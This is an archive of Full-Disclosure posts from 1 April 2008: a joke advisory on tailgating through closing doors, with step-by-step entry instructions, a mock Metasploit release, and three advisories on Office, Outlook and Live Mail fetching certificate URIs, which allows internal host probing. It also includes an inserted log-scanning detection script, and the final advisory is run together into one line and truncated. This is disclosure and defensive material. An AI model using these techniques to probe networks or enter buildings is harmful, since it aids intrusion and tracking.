From druid at caughq.org Tue Apr 1 06:00:22 2008
From: druid at caughq.org (I)ruid)
Date: Tue, 01 Apr 2008 00:00:22 -0500
Subject: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door Race Condition
Message-ID: <1207026022.3142.287.camel@localhost>

                    ____      ____     __    __
                   /    \    /    \   |  |  |  |
      ----====####/  /\__\##/  /\  \##|  |##|  |####====----
                 |  |      |  |__|  | |  |  |  |
                 |  |  ___ |   __   | |  |  |  |
------======######\  \/  /#|  |##|  |#|  |##|  |######======------
                   \____/  |__|  |__|  \______/

                   Computer Academic Underground
                       http://www.caughq.org
                         Security Advisory

===============/========================================================
Advisory ID:    CAU-2008-0001
Release Date:   04/01/2008
Title:          Slowly Closing Door Race Condition
Application/OS: Physical Structures
Topic:          Physical structures employing exit doors with locks
                are vulnerable to a race condition.
Vendor Status:  Not Notified
Attributes:     Physical, Race Condition
Advisory URL:   http://www.caughq.org/advisories/CAU-2008-0001.txt
Author/Email:   CAU
===============/========================================================

Overview
========

Physical structures which employ automatically locking doors to secure
exit points expose a race condition which may allow unauthorized entry.


Impact
======

Malicious outsiders may be able to enter a structure via an exit point.

Exit points may additionally provide an exit from a secure area of the
structure, allowing an outsider entering through the exit point to gain
direct access to the secure area.


Affected Systems
================

Physical structures which employ automatically locking doors at exit
points of the structure.


Technical Explanation
=====================

An exit's lock[1] generally converts a two-way door into a one-way
door, allowing a person to traverse the door's threshold in one
direction but not in the other. These types of locks are used to
secure exit points of structures so that people may exit via the door
but not re-enter without disabling the lock through force or
authentication.

When a person exits the structure through an exit point which is
secured by such a mechanism, a race condition exists wherein a
malicious outsider may be able to reach the door and enter through it
before it closes and locks itself.

Many doors, especially heavier ones, also employ closing mechanisms[2]
which are designed to cause the door to close slowly so as not to slam
the door shut and damage the door frame, or damage any human appendage
which may be in between the door and its frame. Such closing
mechanisms can greatly increase the amount of time that the race
condition exists.


Solution & Recommendations
==========================

1) Always ensure that personnel exiting an exit door wait outside the
   door until it has completely closed and locked before walking
   away.

2) Employ a double door system such as is used in an air-lock where
   the interior door must be secured prior to the exterior door being
   allowed to open.


Exploitation
============

First identify the exit point that you want to exploit. Stand at a
safe distance during a high-traffic time and watch for people to use
the exit point. Time how long it takes for the door to close and
lock itself when someone traverses the exit point.

Next, identify a safe hiding place near the exit point, preferably
in a direction that would be behind a person exiting the door, but
which is within a distance to the exit point which you could traverse
in under the door's closing time at a brisk pace or run.

Finally, hide in this location during a lower traffic time and wait
for someone to utilize the exit point. After they have exited the
door and are walking away, run to the door and enter before it has
closed and locked. Extra points are awarded for a spectacular dive
and/or roll to catch the door at the very last second.

References
==========

[1] http://en.wikipedia.org/wiki/Lock_%28device%29
[2] http://en.wikipedia.org/wiki/Door_closer


Credits & Gr33ts
================

Theodor Geisel, AHA!, NMRC, Uninformed Journal, dc214


--
I)ruid, C?ISSP
druid at caughq.org
http://druid.caughq.org

From nate.mcfeters at gmail.com Tue Apr 1 06:18:00 2008
From: nate.mcfeters at gmail.com (Nate McFeters)
Date: Tue, 1 Apr 2008 00:18:00 -0500
Subject: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door Race Condition
In-Reply-To: <1207026022.3142.287.camel@localhost>
References: <1207026022.3142.287.camel@localhost>
Message-ID: <997ef2c20803312218n65a6321cq215f88e872de41ba@mail.gmail.com>

Hahaha, nice find.

On 4/1/08, I)ruid wrote:
>
>                     ____      ____     __    __
>                    /    \    /    \   |  |  |  |
>       ----====####/  /\__\##/  /\  \##|  |##|  |####====----
>                  |  |      |  |__|  | |  |  |  |
>                  |  |  ___ |   __   | |  |  |  |
> ------======######\  \/  /#|  |##|  |#|  |##|  |######======------
>                    \____/  |__|  |__|  \______/
>
>                    Computer Academic Underground
>                        http://www.caughq.org
>                          Security Advisory
>
> ===============/========================================================
> Advisory ID:    CAU-2008-0001
> Release Date:   04/01/2008
> Title:          Slowly Closing Door Race Condition
> Application/OS: Physical Structures
> Topic:          Physical structures employing exit doors with locks
>                 are vulnerable to a race condition.
> Vendor Status:  Not Notified
> Attributes:     Physical, Race Condition
> Advisory URL:   http://www.caughq.org/advisories/CAU-2008-0001.txt
> Author/Email:   CAU
> ===============/========================================================
>
> Overview
> ========
>
> Physical structures which employ automatically locking doors to secure
> exit points expose a race condition which may allow unauthorized entry.
>
>
> Impact
> ======
>
> Malicious outsiders may be able to enter a structure via an exit point.
>
> Exit points may additionally provide an exit from a secure area of the
> structure, allowing an outsider entering through the exit point to gain
> direct access to the secure area.
>
>
> Affected Systems
> ================
>
> Physical structures which employ automatically locking doors at exit
> points of the structure.
>
>
> Technical Explanation
> =====================
>
> An exit's lock[1] generally converts a two-way door into a one-way
> door, allowing a person to traverse the door's threshold in one
> direction but not in the other. These types of locks are used to
> secure exit points of structures so that people may exit via the door
> but not re-enter without disabling the lock through force or
> authentication.
>
> When a person exits the structure through an exit point which is
> secured by such a mechanism, a race condition exists wherein a
> malicious outsider may be able to reach the door and enter through it
> before it closes and locks itself.
>
> Many doors, especially heavier ones, also employ closing mechanisms[2]
> which are designed to cause the door to close slowly so as not to slam
> the door shut and damage the door frame, or damage any human appendage
> which may be in between the door and its frame. Such closing
> mechanisms can greatly increase the amount of time that the race
> condition exists.
>
>
> Solution & Recommendations
> ==========================
>
> 1) Always ensure that personnel exiting an exit door wait outside the
>    door until it has completely closed and locked before walking
>    away.
>
> 2) Employ a double door system such as is used in an air-lock where
>    the interior door must be secured prior to the exterior door being
>    allowed to open.
>
>
> Exploitation
> ============
>
> First identify the exit point that you want to exploit. Stand at a
> safe distance during a high-traffic time and watch for people to use
> the exit point. Time how long it takes for the door to close and
> lock itself when someone traverses the exit point.
>
> Next, identify a safe hiding place near the exit point, preferably
> in a direction that would be behind a person exiting the door, but
> which is within a distance to the exit point which you could traverse
> in under the door's closing time at a brisk pace or run.
>
> Finally, hide in this location during a lower traffic time and wait
> for someone to utilize the exit point. After they have exited the
> door and are walking away, run to the door and enter before it has
> closed and locked. Extra points are awarded for a spectacular dive
> and/or roll to catch the door at the very last second.
>
>
> References
> ==========
>
> [1] http://en.wikipedia.org/wiki/Lock_%28device%29
> [2] http://en.wikipedia.org/wiki/Door_closer
>
>
> Credits & Gr33ts
> ================
>
> Theodor Geisel, AHA!, NMRC, Uninformed Journal, dc214
>
>
> --
> I)ruid, C?ISSP
> druid at caughq.org
> http://druid.caughq.org
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
From fdlist at digitaloffense.net Tue Apr 1 06:49:23 2008
From: fdlist at digitaloffense.net (METASPLOIT CORPORATION)
Date: Tue, 1 Apr 2008 00:49:23 -0500
Subject: [Full-disclosure] Metasploit Framework 4.0 / PwnCraft RTS Game
Message-ID: <200804010049.23823.fdlist@digitaloffense.net>

FOR IMMEDIATE RELEASE - APR 1, 200(2<<2)

METASPLOIT CORPORATION ANNOUNCES VERSION 4.0 OF THE METASPLOIT
FRAMEWORK WITH EXCITING FEATURES AND A CLOSED SOURCE LICENSE AGREEMENT.

After over a year and a half in stealth-mode, Metasploit Corporation
has announced the 4.0 release of their flag-ship product, The
Metasploit Framework. The new release comes jam-packed with exciting
features that are sure to please even the German legal system. The
following brief list includes some of the more fantastic changes.

PWNCRAFT!

Tired of fighting the good fight with the tried and true user
interfaces you've come to expect from exploitation frameworks? Seeing
a command shell for the 5000th time got you down? Well, you're in
luck. Metasploit has decided to return to its rootz in '08 and focus
on the exploitation-as-a-game model. PwnCraft brings the worlds of
ownage and pwnage together for the first time in a revolutionary Real
Time Strategy (RTS) world. Don't be fooled by the game-like interface,
though! The actions you take in PwnCraft have a real effect on the
world around you! Here's just a taste of some of the absolutely insane
features you can look forward to:

 - Glide through enemy networks with a squadron of elegant winged
   pwnies
 - Launch devastating attacks against enemy ports in an all-out
   IPS-evading TCP/IP assault
 - Use the fuzzy Burrowing Badger unit to discover 0day flaws in enemy
   defenses
 - Conqueer cities and installing agents who can sabotage and smuggle
   other units to new Vistas
 - An entirely in-game interface to the vulnerability sharing market
   to improve your arsenal on the fly!
 - AND MORE!

Beta testing of PwnCraft is currently underway and we are hoping to
begin releasing it in stores at a retail price of $49.99 in Q3 2009.
More details about the game can be found on the Metasploit website:

http://metasploit.com/

CLOSED SOURCE LICENSE

After years of struggling to define Metasploit's licensing position a
final decision has been made to "screw it" and move the framework to a
closed source license agreement. The decision was made to sell out for
a number of reasons, not the least of which has to do with the
benjamins. Metasploit 2.x and 3.x will no longer be available for
public download.

SPLOIT AT ME

Get the latest exploits from Metasploit's patent-pending Sploit At Me
service that delivers exploits on demand. You can rest assured that
Metasploit's Sploit At Me service will attempt to compromise machines
of your choosing with *99% reliability.

About Metasploit Corporation

Metasploit Corporation is an industry leader with thousands of
non-paying customers world-wide. Metasploit delivers high-quality,
top-notch, success-driven exploits to the security world as
one-stop-shop exploitation framework.

* The other 1% of the time, your own machine will be compromised.

From a.klink at cynops.de Tue Apr 1 10:05:53 2008
From: a.klink at cynops.de (Alexander Klink)
Date: Tue, 01 Apr 2008 11:05:53 +0200
Subject: [Full-disclosure] HTTP over X.509 - Microsoft Outlook
Message-ID: <47F1FAF1.8020804@cynops.de>

============================================
||| Security Advisory AKLINK-SA-2008-002 |||
============================================

HTTP over X.509 (S/MIME) - Microsoft Outlook
============================================

Date released: 01.04.2008
Date reported: 11.01.2008
$Revision: 1.1 $

by Alexander Klink
   Cynops GmbH
   a.klink at cynops.de
   https://www.cynops.de/advisories/AKLINK-SA-2008-002.txt
   (S/MIME signed: https://www.cynops.de/advisories/AKLINK-SA-2008-002-signed.txt)
   https://www.klink.name/security/aklink-sa-2008-002-outlook-smime.txt

Vendor: Microsoft
Product: Outlook
Type of vulnerability: design problem
Class: remote
Status: unpatched
Severity: moderate
Releases known to be affected: Outlook 2007 (12.0.4518.1014)
Releases known NOT to be affected: none

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Background:

S/MIME (Secure / Multipurpose Internet Mail Extensions) is a standard
for public key encryption and signing of e-mail based on X.509
certificates. X.509 certificates allow a number of extensions which
specify URIs for additional information regarding the certificate -
for example a location where to download the issuer certificate(s).
For details see RFC 3851/3850.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Overview:

When receiving an S/MIME-signed email, Outlook attempts to use the
additional URIs contained in the certificate to download information
relevant for the verification of the certificate. It will
automatically send out HTTP requests to any location that is reachable
from the client - which might include networks previously unreachable
to an attacker.
Results are unnoticed access to both external or internal webservers,
which in turn could be attacked using other vectors and - in the
simplest case - a "reading confirmation", which is often undesired by
the recipient as well (for example if the sender is a spammer).

For an overview of this class of attacks, see the "HTTP over X.509"
whitepaper at https://www.cynops.de/techzone/http_over_x509.html.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Technical details:

For an introduction to the technical details, please see the
whitepaper.

In this particular case, Microsoft Crypto API handles the
authorityInfoAccess caIssuers extension. The HTTP requests are sent
out as soon as the e-mail is opened in the preview pane.

The Microsoft Crypto API accepts up to five CA Issuer URIs in the
given certificate which may be up to 8 kibibit each (so there is
enough space for a potential attack payload). Contrary to the RFC, it
only accepts HTTP URIs.

The Crypto API connects to arbitrary TCP ports (both privileged and
unprivileged) specified in the HTTP URI. In one test, the attempt to
connect to a running machine (more or less regardless whether the
particular requested port is open or not) took about 3 seconds and
attempting to connect to an unreachable machine took about 10-16
seconds. If this could be confirmed to be always the case (some
preliminary tests indicated otherwise), this would allow one to scan
for internal hosts via mail (at the great speed of two hosts per
opened mail - it is not as fast as PortBunny, granted).

In yet undetermined intervals, it also seems to occasionally try to
get the CA issuer certificates again, leading to more HTTP requests.

Also to be noted is that the certificate validation takes place even
if the S/MIME signature itself is invalid - this means that a clever
spammer would not even have to burn CPU cycles on creating correct
signatures.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Proof of Concept:

To receive such an S/MIME-signed email that triggers a HTTP request
and to verify that this request reaches an outside server, send a
blank email to smime-http at klink.name.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Communication:

11.01.2008, 17:20 UTC: Contacted secure at microsoft.com with
  information, advisory draft (in an S/MIME-encrypted mail) and an
  example mail.
11.01.2008, 18:30 and 18:49 UTC: The example mail triggers HTTP
  requests from 131.107.0.[104|75] with a user agent of
  "Microsoft-CryptoAPI/5.131.3790.3959".
11.01.2008, 21:54 UTC: Nate from Microsoft replies with case number
  (7897) and case manager (Geoff). The original mail is fullquoted in
  this unencrypted reply - why did I bother to install their
  certificate again?
14.01.2008, 17:33 UTC: The example mail triggers more HTTP requests
  from 131.107.0.103, this time with a user agent of
  "Microsoft-CryptoAPI/5.131.2600.2180".
31.01.2008/01.02.2008: The example mail regularly triggers HTTP
  requests from 207.46.55.29, with user agents of
  "Microsoft-CryptoAPI/5.131.2600.2180"
  "Microsoft-CryptoAPI/5.131.2600.3285",
  "Microsoft-CryptoAPI/5.131.2600.3297",
  "Microsoft-CryptoAPI/5.131.3790.1830",
  "Microsoft-CryptoAPI/5.131.3790.3959" and
  "Microsoft-CryptoAPI/6.0",
01.02.2008, 00:14 UTC: Geoff replies to let me know they are working
  on it (yes, I can see that :-). Dave and a few additional teams are
  assisting with the investigation of the issue, no requests for
  additional information, they will stay in contact within the next
  few weeks to provide me with an update. The original report is again
  sent along unencrypted and fullquoted.
February/March 2008: The occasional Microsoft HTTP request appears in
  the webserver logfiles
18.03.2008: Requested update on the issue, informed them that Office
  2007 is vulnerable to the same problem as well (as are signed
  executables, but the signature is not checked automatically) and
  IPSec does not seem to be vulnerable.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Solution:

None so far.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Workarounds:

- limit Outlook's ability to do HTTP requests, for example by setting
  an invalid proxy in the internet options. If possible, filter
  outgoing HTTP requests with a user-agent matching
  "Microsoft-CryptoAPI/*"

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Why this advisory has no CVE ID:

Normally, I make sure every advisory I release has a CVE ID to ensure
that the issue can be identified without doubt. In the past, I have
been assigned CVE IDs directly and promptly by Steve Christey of
MITRE. The communication in this case went like this:

17.01.2008: contacted Steve Christey with the question on how to
  handle CVEs for a generic issue in an RFC that is vulnerable in a
  specific implementation.
01.02.2008: contact Steve again to ask for an update
01.02.2008: Steve replies saying that he must have missed the first
  email and says:
  | This can be a tough one for CVE, but if it's a fundamental design problem
  | in a single RFC, and *any* conformant implementation will have the issue,
  | then it gets a single CVE.
02.02.2008: Updated Steve with details on the vulnerability
07.02.2008: Contacted Steve again for an update
26.02.2008: Contacted Steve again with the explicit wish for CVE IDs
  for the issues in Outlook, Windows Live Mail and Office 2007
28.02.2008: Contacted Steve again asking for the assignment of the
  CVE IDs
28.02.2008: Contacted cve at mitre.org as well in case Steve is no
  longer the correct contact

From what I read on the CVE website, it looks like Microsoft assigns
the CVE IDs for their own issues themselves, but they don't talk to me
very much either.

I like the CVE idea and would like to use CVE IDs whenever possible,
but someone would have to answer my mails for that.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Credits:

- Alexander Klink, Cynops GmbH (discovery)

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Thanks to:

- Philipp Südmeyer for the help in trying out the first attacks

--
Dipl.-Math. Alexander Klink | IT-Security Engineer |    a.klink at cynops.de
 mobile: +49 (0)178 2121703 |          Cynops GmbH | http://www.cynops.de
----------------------------+----------------------+---------------------
      HRB 7833, Amtsgericht | USt-Id: DE 213094986 |     Geschäftsführer:
     Bad Homburg v. d. Höhe |                      |      Martin Bartosch

From a.klink at cynops.de Tue Apr 1 10:06:03 2008
From: a.klink at cynops.de (Alexander Klink)
Date: Tue, 01 Apr 2008 11:06:03 +0200
Subject: [Full-disclosure] HTTP over X.509 - Windows Live Mail
Message-ID: <47F1FAFB.106@cynops.de>

============================================
||| Security Advisory AKLINK-SA-2008-003 |||
============================================

HTTP over X.509 (S/MIME) - Windows Live Mail
============================================

Date released: 01.04.2008
Date reported: 11.01.2008
$Revision: 1.1 $

by Alexander Klink
   Cynops GmbH
   a.klink at cynops.de
   https://www.cynops.de/advisories/AKLINK-SA-2008-003.txt
   (S/MIME signed: https://www.cynops.de/advisories/AKLINK-SA-2008-003-signed.txt)
   https://www.klink.name/security/aklink-sa-2008-003-live-mail-smime.txt

Vendor: Microsoft
Product: Windows Live Mail
Type of vulnerability: design problem
Class: remote
Status: unpatched
Severity: moderate
Releases known to be affected: 2008 (Build 12.0.1606)
Releases known NOT to be affected: none

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Background:

S/MIME (Secure / Multipurpose Internet Mail Extensions) is a standard
for public key encryption and signing of e-mail based on X.509
certificates. X.509 certificates allow a number of extensions which
specify URIs for additional information regarding the certificate -
for example a location where to download the issuer certificate(s).
For details see RFC 3851/3850.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Overview:

When receiving an S/MIME-signed email, Windows Live Mail attempts to
use the additional URIs contained in the certificate to download
information relevant for the verification of the certificate.
It will automatically send out HTTP requests to any location that is
reachable from the client - which might include networks previously
unreachable to an attacker.

Results are unnoticed access to both external or internal webservers,
which in turn could be attacked using other vectors and - in the
simplest case - a "reading confirmation", which is often undesired by
the recipient as well (for example if the sender is a spammer).

For an overview of this class of attacks, see the "HTTP over X.509"
whitepaper at https://www.cynops.de/techzone/http_over_x509.html.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Technical details:

For an introduction to the technical details, please see the
whitepaper.

In this particular case, Microsoft Crypto API handles the
authorityInfoAccess caIssuers extension. The HTTP requests are sent
out as soon as the e-mail is opened in the preview pane.

The Microsoft Crypto API accepts up to five CA Issuer URIs in the
given certificate which may be up to 8 kibibit each (so there is
enough space for a potential attack payload). Contrary to the RFC, it
only accepts HTTP URIs.

The Crypto API connects to arbitrary TCP ports (both privileged and
unprivileged) specified in the HTTP URI. In one test, the attempt to
connect to a running machine (more or less regardless whether the
particular requested port is open or not) took about 3 seconds and
attempting to connect to an unreachable machine took about 10-16
seconds. If this could be confirmed to be always the case (some
preliminary tests indicated otherwise), this would allow one to scan
for internal hosts via mail (at the great speed of two hosts per
opened mail - it is not as fast as PortBunny, granted).

In yet undetermined intervals, it also seems to occasionally try to
get the CA issuer certificates again, leading to more HTTP requests.

Also to be noted is that the certificate validation takes place even
if the S/MIME signature itself is invalid - this means that a clever
spammer would not even have to burn CPU cycles on creating correct
signatures.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Proof of Concept:

To receive such an S/MIME-signed email that triggers a HTTP request
and to verify that this request reaches an outside server, send a
blank email to smime-http at klink.name.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Communication:

11.01.2008, 17:20 UTC: Contacted secure at microsoft.com with
  information, advisory draft (in an S/MIME-encrypted mail) and an
  example mail.
11.01.2008, 18:30 and 18:49 UTC: The example mail triggers HTTP
  requests from 131.107.0.[104|75] with a user agent of
  "Microsoft-CryptoAPI/5.131.3790.3959".
11.01.2008, 21:54 UTC: Nate from Microsoft replies with case number
  (7897) and case manager (Geoff). The original mail is fullquoted in
  this unencrypted reply - why did I bother to install their
  certificate again?
14.01.2008, 17:33 UTC: The example mail triggers more HTTP requests
  from 131.107.0.103, this time with a user agent of
  "Microsoft-CryptoAPI/5.131.2600.2180".
31.01.2008/01.02.2008: The example mail regularly triggers HTTP
  requests from 207.46.55.29, with user agents of
  "Microsoft-CryptoAPI/5.131.2600.2180"
  "Microsoft-CryptoAPI/5.131.2600.3285",
  "Microsoft-CryptoAPI/5.131.2600.3297",
  "Microsoft-CryptoAPI/5.131.3790.1830",
  "Microsoft-CryptoAPI/5.131.3790.3959" and
  "Microsoft-CryptoAPI/6.0",
01.02.2008, 00:14 UTC: Geoff replies to let me know they are working
  on it (yes, I can see that :-). Dave and a few additional teams are
  assisting with the investigation of the issue, no requests for
  additional information, they will stay in contact within the next
  few weeks to provide me with an update. The original report is again
  sent along unencrypted and fullquoted.
February/March 2008: The occasional Microsoft HTTP request appears in
  the webserver logfiles
18.03.2008: Requested update on the issue, informed them that Office
  2007 is vulnerable to the same problem as well (as are signed
  executables, but the signature is not checked automatically) and
  IPSec does not seem to be vulnerable.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Solution:

None so far.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Workarounds:

- limit Live Mail's ability to do HTTP requests, for example by
  setting an invalid proxy in the internet options. If possible,
  filter outgoing HTTP requests with a user-agent matching
  "Microsoft-CryptoAPI/*"

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Why this advisory has no CVE ID:

Normally, I make sure every advisory I release has a CVE ID to ensure
that the issue can be identified without doubt. In the past, I have
been assigned CVE IDs directly and promptly by Steve Christey of
MITRE. The communication in this case went like this:

17.01.2008: contacted Steve Christey with the question on how to
  handle CVEs for a generic issue in an RFC that is vulnerable in a
  specific implementation.
01.02.2008: contact Steve again to ask for an update
01.02.2008: Steve replies saying that he must have missed the first
  email and says:
  | This can be a tough one for CVE, but if it's a fundamental design problem
  | in a single RFC, and *any* conformant implementation will have the issue,
  | then it gets a single CVE.
02.02.2008: Updated Steve with details on the vulnerability
07.02.2008: Contacted Steve again for an update
26.02.2008: Contacted Steve again with the explicit wish for CVE IDs
  for the issues in Outlook, Windows Live Mail and Office 2007
28.02.2008: Contacted Steve again asking for the assignment of the
  CVE IDs
28.02.2008: Contacted cve at mitre.org as well in case Steve is no
  longer the correct contact

From what I read on the CVE website, it looks like Microsoft assigns
the CVE IDs for their own issues themselves, but they don't talk to me
very much either.

I like the CVE idea and would like to use CVE IDs whenever possible,
but someone would have to answer my mails for that.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Credits:

- Alexander Klink, Cynops GmbH (discovery)

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Thanks to:

- Philipp Südmeyer for the help in trying out the first attacks using
  Outlook

--
Dipl.-Math. Alexander Klink | IT-Security Engineer |    a.klink at cynops.de
 mobile: +49 (0)178 2121703 |          Cynops GmbH | http://www.cynops.de
----------------------------+----------------------+---------------------
      HRB 7833, Amtsgericht | USt-Id: DE 213094986 |     Geschäftsführer:
     Bad Homburg v. d. Höhe |                      |      Martin Bartosch

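Detection logic for the workaround given in the Outlook and Windows Live Mail advisories above (filter outgoing HTTP requests with a user-agent matching "Microsoft-CryptoAPI/*"), as an added example that is not part of the original posts: it reads proxy log lines, picks out CryptoAPI fetches and flags the destinations the advisories are concerned with (internal addresses, arbitrary ports, oversized URIs, several internal hosts from one client). The log layout, the sample lines, the allowlisted CA host and the thresholds are assumptions.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample lines in an assumed proxy log layout:
#   epoch-seconds client-ip method url "user-agent"
SAMPLE_LOG = """\
1207040000 10.1.4.22 GET http://ca.example.com/issuer.crt "Microsoft-CryptoAPI/6.0"
1207040003 10.1.4.22 GET http://192.168.10.5:8080/a "Microsoft-CryptoAPI/5.131.2600.2180"
1207040006 10.1.4.22 GET http://192.168.10.6:22/ "Microsoft-CryptoAPI/5.131.2600.2180"
1207040010 10.1.4.37 GET http://tracker.example.net/open/abc "Microsoft-CryptoAPI/6.0"
1207040020 10.1.4.37 GET http://www.example.org/index.html "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\d+) (\S+) (\S+) (\S+) "([^"]*)"$')
CRYPTOAPI_UA = re.compile(r"^Microsoft-CryptoAPI/")  # pattern from the advisory
ALLOWED_CA_HOSTS = {"ca.example.com"}  # assumption: CA hosts you expect to see
MAX_URI_LEN = 256                      # assumption: longer AIA URIs are unusual


def classify(url):
    """Return (target, reasons) for one URL fetched by CryptoAPI."""
    reasons = []
    try:
        parts = urlsplit(url)
        host = parts.hostname or ""
        port = parts.port or 80
    except ValueError:  # malformed host or out-of-range port
        return url, ["malformed-uri"]
    if host not in ALLOWED_CA_HOSTS:
        reasons.append("unlisted-host")
    try:
        ip = ipaddress.ip_address(host)
        if ip.is_private or ip.is_loopback or ip.is_link_local:
            reasons.append("internal-address")
    except ValueError:
        pass  # a DNS name, not an IP literal
    if port != 80:
        reasons.append("non-standard-port")
    if len(url) > MAX_URI_LEN:
        reasons.append("long-uri")
    return f"{host}:{port}", reasons


def find_cryptoapi_fetches(log_text):
    """List CryptoAPI requests whose destination has at least one flag."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, client, _method, url, agent = m.groups()
        if not CRYPTOAPI_UA.match(agent):
            continue
        target, reasons = classify(url)
        if reasons:
            findings.append({"ts": int(ts), "client": client,
                             "target": target, "agent": agent,
                             "reasons": reasons})
    return findings


def scan_suspects(findings, window=60, min_targets=2):
    """Clients that fetched from several internal targets within `window` s.

    This is the "scan for internal hosts via mail" pattern: one opened
    mail makes the client contact more than one internal destination.
    """
    per_client = defaultdict(list)
    for f in findings:
        if "internal-address" in f["reasons"]:
            per_client[f["client"]].append((f["ts"], f["target"]))
    suspects = {}
    for client, events in per_client.items():
        events.sort()
        for start_ts, _ in events:
            seen = {t for ts, t in events
                    if start_ts <= ts <= start_ts + window}
            if len(seen) >= min_targets:
                suspects[client] = sorted(seen)
                break
    return suspects


if __name__ == "__main__":
    hits = find_cryptoapi_fetches(SAMPLE_LOG)
    for h in hits:
        print(h["client"], h["target"], ",".join(h["reasons"]))
    print(scan_suspects(hits))
```
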
From a.klink at cynops.de Tue Apr 1 10:06:13 2008
From: a.klink at cynops.de (Alexander Klink)
Date: Tue, 01 Apr 2008 11:06:13 +0200
Subject: [Full-disclosure] HTTP over X.509 - Office 2007
Message-ID: <47F1FB05.2030107@cynops.de>

============================================
||| Security Advisory AKLINK-SA-2008-004 |||
============================================

HTTP over X.509 - Microsoft Office 2007
=======================================

Date released: 01.04.2008
Date reported: 18.03.2008 (a similar issue was reported on 11.01.2008)
$Revision: 1.1 $

by Alexander Klink
   Cynops GmbH
   a.klink at cynops.de
   https://www.cynops.de/advisories/AKLINK-SA-2008-004.txt
   (S/MIME signed: https://www.cynops.de/advisories/AKLINK-SA-2008-004-signed.txt)
   https://www.klink.name/security/aklink-sa-2008-004-office2007-signatures.txt

Vendor: Microsoft
Product: Office 2007
Type of vulnerability: design problem
Class: remote
Status: unpatched
Severity: moderate
Releases known to be affected: 12.0.6212.1000 SP1 MSO (12.0.6213.1000)
Releases known NOT to be affected: none

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Background:

Microsoft Office 2007 allows a user to sign documents using X.509
certificates. X.509 certificates allow a number of extensions which
specify URIs for additional information regarding the certificate -
for example a location where to download the issuer certificate(s).

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Overview:

When opening a document with a digital signature, Office 2007 attempts
to use the additional URIs contained in the certificate to download
information relevant for the verification of the certificate.
It will automatically send out HTTP requests to any location that is
reachable from the client - which might include networks previously
unreachable to an attacker.

Results are unnoticed access to both external or internal webservers,
which in turn could be attacked using other vectors and - in the
simplest case - an "opening confirmation", which is often undesired by
the recipient as well (as it can be used to track who opened which
document at what time).

For an overview of this class of attacks, see the "HTTP over X.509"
whitepaper at https://www.cynops.de/techzone/http_over_x509.html.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Technical details:

For an introduction to the technical details, please see the
whitepaper.

In this particular case, Microsoft Crypto API handles the
authorityInfoAccess caIssuers extension. The HTTP requests are sent
out as soon as the document is opened.

The Microsoft Crypto API accepts up to five CA Issuer URIs in the
given certificate which may be up to 8 kibibit each (so there is
enough space for a potential attack payload). Contrary to the RFC, it
only accepts HTTP URIs.

The Crypto API connects to arbitrary TCP ports (both privileged and
unprivileged) specified in the HTTP URI. In one test, the attempt to
connect to a running machine (more or less regardless whether the
particular requested port is open or not) took about 3 seconds and
attempting to connect to an unreachable machine took about 10-16
seconds. If this could be confirmed to be always the case (some
preliminary tests indicated otherwise), this would allow one to scan
for internal hosts via mail (at the great speed of two hosts per
opened mail - it is not as fast as PortBunny, granted).

Contrary to the vulnerabilities in Microsoft Outlook and Windows Live
Mail, the certificate is only verified if the signature is intact.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Proof of Concept: A signed Word 2007 document that triggers an HTTP request is available at http://www.klink.name/security/HTTP_over_Office_2007_PoC.docx The document contains a link which shows the last 10 HTTP requests triggered by this document. By verifying whether you are on the list, you can verify if you are affected by this vulnerability. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Communication: 18.03.2008: As part of a communication on a similar issue in Outlook and Windows Live Mail, informed them that Office 2007 is vulnerable as well. For details on the earlier communication, see AKLINK-SA-2008-002 or AKLINK-SA-2008-003. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Solution: None so far. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Workarounds: - limit Office's ability to do HTTP requests, for example by setting an invalid proxy in the internet options. If possible, filter outgoing HTTP requests with a user-agent matching "Microsoft-CryptoAPI/*" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Why this advisory has no CVE ID: Normally, I make sure every advisory I release has a CVE ID to ensure that the issue can be identified without doubt. In the past, I have been assigned CVE IDs directly and promptly by Steve Christey of MITRE. The communication in this case went like this: 17.01.2008: contacted Steve Christey with the question on how to handle CVEs for a generic issue in an RFC that is vulnerable in a specific implementation. 01.02.2008: contact Steve again to ask for an update 01.02.2008: Steve replies saying that he must have missed the first email and says: | This can be a tough one for 